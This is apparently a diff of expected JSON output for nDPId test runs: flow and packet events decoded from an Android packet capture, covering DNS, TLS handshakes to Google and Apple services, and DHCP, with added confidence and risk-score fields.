{"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1582454871920,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1582454871920,"pkt":"TGr2n\/YnxiwDYGpkCABFAABUFXQAAEAR38PAqAIBwKgCEAA1m1AAQNQ0uKWBgAABAAEAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARcABKzZFgo="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454871920,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.10"}}
-00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1582454871920,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.10"}}
+00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871947,"flow_last_seen":1582454871947,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871947,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1582454871947,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871947,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8i1NAAEAGKc3AqAIQrNkWCq1WAbtFj7zOAAAAAKAC\/\/\/ZVgAAAgQFtAQCCAr\/\/zedAAAAAAEDAwg="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1582454871972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871972,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8OOwAAHYGhjSs2RYKwKgCEAG7rVbtvX7+RY+8z6AS6yDuawAAAgQFZAQCCAq7R9gE\/\/83nQEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1582454871974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871974,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0i1RAAEAGKdTAqAIQrNkWCq1WAbtFj7zP7b1+\/4AQAVcGrAAAAQEICv\/\/N6S7R9gE"}
-00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1582454872021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454872021,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrFBAAEARCPrAqAIQwKgCAdv4ADUALYKcD\/4BAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1582454872022,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1582454872022,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRBMwAAEAR8G7AqAIBwKgCEAA12\/gAPTZ5D\/6BgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872022,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872022,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454872031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454872031,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8+JhAAEAGvkXAqAIQrNkUTKqEAbsc\/M8rAAAAAKAC\/\/\/0BgAAAgQFtAQCCAr\/\/zezAAAAAAEDAwg="}
-00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+01069{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454784313,"flow_last_seen":1582454866536,"flow_idle_time":180000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3584,"flow_avg_l4_payload_len":298,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454784313,"flow_last_seen":1582454866536,"flow_idle_time":180000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3584,"flow_avg_l4_payload_len":298,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
